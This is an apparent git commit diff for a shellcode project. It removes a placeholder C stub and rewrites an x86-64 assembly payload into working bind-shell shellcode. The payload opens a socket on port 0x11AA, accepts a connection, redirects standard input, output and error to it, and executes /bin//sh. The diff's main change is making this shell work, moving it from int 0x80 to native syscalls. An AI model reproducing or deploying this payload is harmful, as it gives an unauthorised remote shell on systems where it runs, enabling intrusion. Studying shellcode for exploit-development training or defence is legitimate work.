diff options
Diffstat (limited to 'shellcode')
| -rw-r--r-- | shellcode/simple.c | 11 | ||||
| -rw-r--r-- | shellcode/socket_x64.asm | 43 |
2 files changed, 22 insertions, 32 deletions
diff --git a/shellcode/simple.c b/shellcode/simple.c deleted file mode 100644 index bf2bf43..0000000 --- a/shellcode/simple.c +++ /dev/null @@ -1,11 +0,0 @@ -/* - * gcc -c -Wall -fpic -Os shellcode.c -o shellcode.o - * ld -N -Ttext 0x0 -e _start -Map shellcode.map shellcode.o -o shellcode - * objcopy -R .note -R .comment -S -O binary shellcode shellcode.bin - */ - -int _start(void) { - while (1) { - } - return (0); -} diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm index 131fefa..1ec36b0 100644 --- a/shellcode/socket_x64.asm +++ b/shellcode/socket_x64.asm @@ -8,66 +8,67 @@ xor rdx,rdx mov dil,0x2 ; AF_INET mov sil,0x1 ; SOCK_STREAM mov al,0x29 ; socket() syscall -int 0x80 ; let the kernel do the stuff +syscall mov rdi,rax ; save sockfd (used as argument for future calls) ; bind() xor rax,rax -xor rdi,rdi -xor rsi,rsi push rax ; sockaddr_in: in_addr = 0 push word 0x11AA ; sockaddr_in: tcp port push word 0x2 ; sockaddr_in: sa_family = AF_INET mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in) -mov rdx,0x10 ; addrlen +mov dl,0x10 ; addrlen mov al,0x31 ; bind() syscall -int 0x80 ; kernel mode +syscall ; listen() xor rax,rax xor rsi,rsi ; zero rsi (arg2 -> backlog) mov al,0x32 ; listen() syscall -int 0x80 +syscall ; accept() xor rax,rax push rax ; sockaddr_in: in_addr = 0 -push word ax ; sockaddr_in: tcp_port = 0 +push word 0x11AA ; sockaddr_in: tcp_port = 0 push word 0x2 ; sockaddr_in: sa_family = AF_INET mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in) +push 0x10 ; addr_len +mov rdx,rsp ; pointer to upeer_addrlen mov al,0x2B ; accept() syscall -int 0x80 +syscall + +mov rdi,rax ; save clientfd ; dup2() -xor rcx,rcx -mov cl,0x3 ; loop count +xor rdx,rdx +mov dl,0x3 dupes: -xor rsi,rsi -dec cl ; loop var -mov rsi,rcx ; loop var -> newfd +mov rsi,rdx +dec rsi xor rax,rax -mov al,0x21 ; dup2() syscall -int 0x80 -inc cl -loop dupes +mov al,0x21 +syscall +dec dl +jnz dupes ; exec mov rax,0x68732f6e69622f2f ; string 'hs/nib//' push rax ; push the string onto the stack -mov rdi,rsp ; arg1 = pointer to string xor rax,rax +mov byte [rsp + 8],al ; null-terminate the string +mov rdi,rsp ; arg1 = pointer to string push rax ; arg2 = null mov rsi,rsp push rax ; arg3 = null mov rdx,rsp -mov byte [esp + 8],al ; null-terminate the string mov al,0x3b ; exec() syscall -int 0x80 +syscall ; exit() xor rax,rax xor rdi,rdi mov dil,0x42 ; return code (66d) mov al,0x3c ; exit() syscall -int 0x80 +syscall |